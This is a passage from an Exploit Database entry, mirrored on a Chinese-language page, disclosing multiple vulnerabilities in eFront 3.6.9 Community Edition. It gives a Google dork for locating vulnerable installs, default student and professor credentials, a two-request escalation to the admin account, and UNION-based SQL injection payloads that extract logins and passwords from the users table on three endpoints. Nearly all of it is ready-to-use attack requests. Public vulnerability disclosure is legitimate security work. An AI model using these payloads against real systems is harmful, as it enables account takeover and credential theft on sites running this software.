EFront 3.6.9 Community Edition – Multiple Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： IHTeam
  日期： 2011-10-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17938/

• # Exploit Title: EFront <= 3.6.9 Community Edition Multiple Vulnerabilities
  # Google Dork: "eFront (version 3.6.9)" inurl:index.php?ctg=*
  # Date: 5/09/2011
  # Public release: When 3.6.10 will be released
  # Author: IHTeam
  # Software Link: http://www.efrontlearning.net/download/download-efront.html
  # Tested on: efront_3.6.9_build11018
  # Original Advisory: http://iht.li/FWh
  # Advisory code: http://iht.li/p/0VV
  
  Default username and password:
  student:student
  professor:professor
  
  How to become admin:
  Request 1: /change_account.php?login=admin
  Request 2: /userpage.php
  OR
  simple use the [Switch account] option on top of the page;
  Now you are in admin area;
  
  SQL Injection:
  www/student.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
  www/professor.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
  www/admin.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --